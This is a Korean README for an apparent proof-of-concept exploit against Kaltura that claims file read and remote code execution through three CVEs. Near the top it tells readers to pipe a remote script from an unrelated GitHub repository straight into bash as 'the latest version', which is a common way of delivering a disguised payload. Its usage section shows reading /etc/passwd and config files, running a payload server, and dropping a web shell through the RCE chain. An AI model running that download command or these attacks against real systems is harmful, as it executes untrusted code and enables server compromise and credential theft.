
CVE-2026-19912, CVE-2026-19913, CVE-2026-19914에 대한 개념 증명 익스플로잇으로, Kaltura에서 파일 읽기 및 원격 코드 실행을 시연하며, 승인된 보안 테스트 및 교육을 위해 제작되었습니다.
GitHub에서 최신 버전의 외부 다운로드 스크립트를 직접 실행합니다:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
이 명령어는 Bash와
curl이 필요합니다. 소스를 신뢰할 수 없다면 실행 전에 원격 스크립트를 검토하세요.
이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하세요:
설정 예시:
git clone <repository-url>
cd <repository-name>
# 프로젝트는 아래와 같이 Python을 사용합니다
# 가상 환경 생성
python -m venv venv
# 가상 환경 활성화
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 요구 사항 설치
pip install -r requirements.txt
사용 예시:
# 1. 파일 읽기 (가장 안정적이며, 문서에 설명된 대로 동작)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. 페이로드 서버만 실행 (Burp / curl과 함께 수동으로 사용)
python3 kaltura_poc.py serve --lport 8888
# 3. 전체 체인 스켈레톤
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
통제된 환경에서 사이버 보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.
이 저장소는 교육 및 승인된 보안 연구 전용입니다.
사용자가 다음에 대해 학습할 수 있도록 설계되었습니다:
이 저장소는 권한이 있는 환경에서만 사용하세요. 예:
승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.
저자와 기여자는 이 프로젝트로 인해 발생하는 손해, 오용, 법적 문제 또는 손실에 대해 책임을 지지 않습니다.
이 저장소를 사용함으로써 다음 사항에 동의하게 됩니다:
이 프로젝트는 다음을 위해 제작되었습니다:
책임 있는 공개 절차를 준수하고 모든 관련 법률을 준수하시기 바랍니다.
책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하세요.
승인된 보안 연구 및 교육을 위한 추가 CVE 개념 증명 리소스를 보려면 PoC CVE 컬렉션을 탐색하세요.